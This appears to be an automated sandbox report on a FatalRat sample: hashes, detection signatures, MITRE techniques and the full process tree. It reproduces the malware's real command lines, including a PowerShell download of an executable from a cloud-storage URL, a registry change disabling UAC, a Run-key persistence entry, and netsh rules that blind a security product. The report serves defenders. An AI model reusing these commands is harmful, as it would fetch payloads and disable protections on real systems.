Analysis
- max time kernel: 148s
- max time network: 152s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 23/02/2025, 12:41
Static task: static1
Behavioral task: behavioral1
- Sample: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
- Resource: win10v2004-20250217-en
General
- Target: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
- Size: 20.0MB
- MD5: f999f60afb55137a3c068a707a421a5f
- SHA1: 15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
- SHA256: b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
- SHA512: 24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
- SSDEEP: 196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4
Malware Config
- Extracted: https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe
Signatures
- Fatalrat family
- UAC bypass (3 TTPs, 1 IoC)
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
- Fatal Rat payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp | fatalrat
- Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  17 | 1688 | powershell.exe
  18 | 1688 | powershell.exe
- Downloads MZ/PE file (1 IoC)
  flow | pid | Process
  17 | 1688 | powershell.exe
- Modifies Windows Firewall (2 TTPs, 8 IoCs)
  pid | Process
  892 | netsh.exe
  1208 | netsh.exe
  1840 | netsh.exe
  1564 | netsh.exe
  2172 | netsh.exe
  2204 | netsh.exe
  1292 | netsh.exe
  444 | netsh.exe
- Executes dropped EXE (1 IoC)
  pid | Process
  2384 | Agghosts.exe
- Loads dropped DLL (1 IoC)
  pid | Process
  2384 | Agghosts.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | reg.exe
- Command and Scripting Interpreter: PowerShell
  pid | Process
  1688 | powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 24 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description | ioc | Process
  Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (x8)
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (x8)
  Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe (x8)
- System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Agghosts.exe
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Agghosts.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | Agghosts.exe
- Suspicious behavior: EnumeratesProcesses (59 IoCs)
  pid | Process
  2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe (x7)
  1688 | powershell.exe (x1)
  2384 | Agghosts.exe (x51)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2384 | Agghosts.exe
  Token: SeDebugPrivilege | 1688 | powershell.exe
- Suspicious use of WriteProcessMemory (49 IoCs)
  description | pid | Process | procid_target
  PID 2736 wrote to memory of 2000 | 2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 32 (x3)
  PID 2736 wrote to memory of 2384 | 2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 34 (x4)
  PID 2000 wrote to memory of 600 | 2000 | cmd.exe | 35 (x3)
  PID 2736 wrote to memory of 276 | 2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 36 (x3)
  PID 2736 wrote to memory of 2008 | 2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 38 (x3)
  PID 2736 wrote to memory of 2764 | 2736 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 39 (x3)
  PID 2764 wrote to memory of 1564 | 2764 | cmd.exe | 42 (x3)
  PID 2008 wrote to memory of 236 | 2008 | cmd.exe | 43 (x3)
  PID 2008 wrote to memory of 1688 | 2008 | cmd.exe | 44 (x3)
  PID 2764 wrote to memory of 2172 | 2764 | cmd.exe | 45 (x3)
  PID 2764 wrote to memory of 2204 | 2764 | cmd.exe | 46 (x3)
  PID 2764 wrote to memory of 1292 | 2764 | cmd.exe | 47 (x3)
  PID 2764 wrote to memory of 444 | 2764 | cmd.exe | 48 (x3)
  PID 2764 wrote to memory of 892 | 2764 | cmd.exe | 49 (x3)
  PID 2764 wrote to memory of 1208 | 2764 | cmd.exe | 50 (x3)
  PID 2764 wrote to memory of 1840 | 2764 | cmd.exe | 51 (x3)
Processes
- C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe (PID 2736)
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 2000)
    Command line: cmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 600)
      Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      Signatures: UAC bypass
  - C:\programdata\20250223024200\Agghosts.exe (PID 2384)
    Command line: "C:\programdata\20250223024200\Agghosts.exe"
    Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\reg.exe (PID 276)
    Command line: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
    Signatures: Adds Run key to start application
  - C:\Windows\system32\cmd.exe (PID 2008)
    Command line: cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\chcp.com (PID 236)
      Command line: chcp 65001
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1688)
      Command line: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
      Signatures: Blocklisted process makes network request; Downloads MZ/PE file; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 2764)
    Command line: cmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\netsh.exe (PID 1564)
      Command line: netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 2172)
      Command line: netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 2204)
      Command line: netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 1292)
      Command line: netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 444)
      Command line: netsh advfirewall set allprofiles state on
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 892)
      Command line: netsh advfirewall set privateprofile settings inboundusernotification disable
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 1208)
      Command line: netsh advfirewall set publicprofile settings inboundusernotification disable
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    - C:\Windows\system32\netsh.exe (PID 1840)
      Command line: netsh advfirewall set domainprofile settings inboundusernotification disable
      Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (1)
- Modify Registry (2)